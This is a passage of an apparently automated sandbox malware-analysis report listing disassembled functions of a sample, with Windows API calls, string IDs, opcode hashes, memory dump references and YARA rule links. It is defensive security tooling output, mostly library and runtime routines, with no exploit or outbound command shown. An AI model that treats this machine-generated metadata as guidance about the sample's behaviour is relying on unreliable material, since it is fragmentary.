                                                      • Instruction Fuzzy Hash: 26F06861B1970686EB248B24FC463396720AF9D7E1F540335C57D452E8DF6CD145C740
                                                      Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                      • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                      • ExitProcess.KERNEL32 ref: 0000000140008545
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AddressExitHandleModuleProcProcess
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 75539706-1276376045
                                                      • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                      • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                      • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                      • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                      Function 00007FF8FF5D40D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                      • Instruction ID: 881b330c605eb50c7d0489ec89205b640ae289a8d99617e2ee60196e995a228e
                                                      • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                      • Instruction Fuzzy Hash: 79B19121A0FA868BEB65DB55988023D6394AF6CBC4F098635DE7D077C9DF3DE4828300
                                                      Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: FileInfoSleepStartupType
                                                      • String ID:
                                                      • API String ID: 1527402494-0
                                                      • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                      • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                      • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                      • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                      Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                      • String ID:
                                                      • API String ID: 3078728599-0
                                                      • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                      • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                      • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                      • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                      Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                      • String ID:
                                                      • API String ID: 1850339568-0
                                                      • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                      • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                      • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                      • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                      Function 00007FF8FF5DFB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                      • Instruction ID: 549f3655bd0ca5dac05a6d840560a214ac02da9bab74bec93f14fba5cdc5e6c6
                                                      • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                      • Instruction Fuzzy Hash: 19110772E1EA1A1AF7541128ED6637D12816FAC3F4F584734E9BE067DB8E2CE8454601
                                                      Function 00007FF8FF5D9684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF8FF5D766F,?,?,00000000,00007FF8FF5D790A,?,?,?,?,?,00007FF8FF5D7896), ref: 00007FF8FF5D96A3
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D766F,?,?,00000000,00007FF8FF5D790A,?,?,?,?,?,00007FF8FF5D7896), ref: 00007FF8FF5D96C2
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D766F,?,?,00000000,00007FF8FF5D790A,?,?,?,?,?,00007FF8FF5D7896), ref: 00007FF8FF5D96EA
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D766F,?,?,00000000,00007FF8FF5D790A,?,?,?,?,?,00007FF8FF5D7896), ref: 00007FF8FF5D96FB
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D766F,?,?,00000000,00007FF8FF5D790A,?,?,?,?,?,00007FF8FF5D7896), ref: 00007FF8FF5D970C
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Value
                                                      • String ID:
                                                      • API String ID: 3702945584-0
                                                      • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                      • Instruction ID: b34b85bfd02a29564da010c3d20510163f890c24d127bc8841da58223e974bb7
                                                      • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                      • Instruction Fuzzy Hash: D7113720F0E2434FFB58AB25AD5217D61829FAC7F0F544334E87E0ABD6EE2CA4428600
                                                      Function 00007FF8FF5D9518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Value
                                                      • String ID:
                                                      • API String ID: 3702945584-0
                                                      • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                      • Instruction ID: 4bcbed2a1dc551d2e6f6693bf19765015394cec1dbd3409cd0bf88ac35a96bb0
                                                      • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                      • Instruction Fuzzy Hash: B711B754E0F20B5FFB6DAA615C6227D11824F6D3F5F580734D93E0A3E6EE2CB4428601
                                                      Function 00007FF8FF5D5448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3544855599-2084237596
                                                      • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                      • Instruction ID: 3c7454a603434f65dbdc1b42a0ed6e0896c80d1206ad34655a8b66ae9907e2a1
                                                      • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                      • Instruction Fuzzy Hash: C4918E73A097858BE751CB64D8802AD7BA0FB58BC8F14423AEE6D17B95DF38D195CB00
                                                      Function 00007FF8FF5D3A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 2395640692-1018135373
                                                      • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                      • Instruction ID: cd46d2c8a47eb98af2769e9d5dc2781ca245a3ac42effd089102d4edf4bbe085
                                                      • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                      • Instruction Fuzzy Hash: 12517E32B1F6428FEB148B15E84467CB791EB68BC8F148235DABA577C9DA7DE841C700
                                                      Function 00007FF8FF5D51D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3544855599-2084237596
                                                      • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                      • Instruction ID: 2e5aebfb23e96bcfd1243e4ce7821c0fa2af6784375bc3ff55673492085fbbaf
                                                      • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                      • Instruction Fuzzy Hash: 23617E3290DB858AD7209B15E8403AEB7A0FB99BC4F044225EFAD07B95CF7CD194CB00
                                                      Function 00007FF8FF5D59C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                      • String ID: csm$csm
                                                      • API String ID: 3896166516-3733052814
                                                      • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                      • Instruction ID: b9cb72a8afd60c83a1bf0f4d9c0f8db0c9b8c2a67a061805d15c0e367e22eb62
                                                      • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                      • Instruction Fuzzy Hash: AA514C3290E2828FEB648B11988436C76A0EB69BD5F544236DEBE47BC6CF3CE451C701
                                                      Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleLoadModuleProc
                                                      • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                      • API String ID: 3055805555-3733552308
                                                      • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                      • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                      • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                      • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                      Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentSizeWorking
                                                      • String ID: Shrinking process size
                                                      • API String ID: 2122760700-652428428
                                                      • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                      • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                      • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                      • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                      Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Enter$Leave
                                                      • String ID:
                                                      • API String ID: 2801635615-0
                                                      • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                      • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                      • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                      • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                      Function 00007FF8FF5DE3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                      • String ID:
                                                      • API String ID: 2718003287-0
                                                      • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                      • Instruction ID: a7bfe0de7e4524393e11afe5d5890156b090c81da6d37504c6c6394a31559209
                                                      • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                      • Instruction Fuzzy Hash: DBD1BF32B1AA918FE711CF65D8402AC37A1FB687D8B448226DE7D97BD9DE38D406C740
                                                      Function 00007FF8FF5DED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8FF5DED07), ref: 00007FF8FF5DEE38
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8FF5DED07), ref: 00007FF8FF5DEEC3
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ConsoleErrorLastMode
                                                      • String ID:
                                                      • API String ID: 953036326-0
                                                      • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                      • Instruction ID: a6309a2cca96ae1bacca5d8c61bd701dfe36cc804a92b9f3e4c5b513197887b6
                                                      • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                      • Instruction Fuzzy Hash: 2491A162A1D6628FF7509F659C802BD2BA0EB28BC8F144239DE7E576C5DF78D486C700
                                                      Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                      • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                      • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalEventSection$EnterLeaveReset
                                                      • String ID:
                                                      • API String ID: 3553466030-0
                                                      • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                      • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                      • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
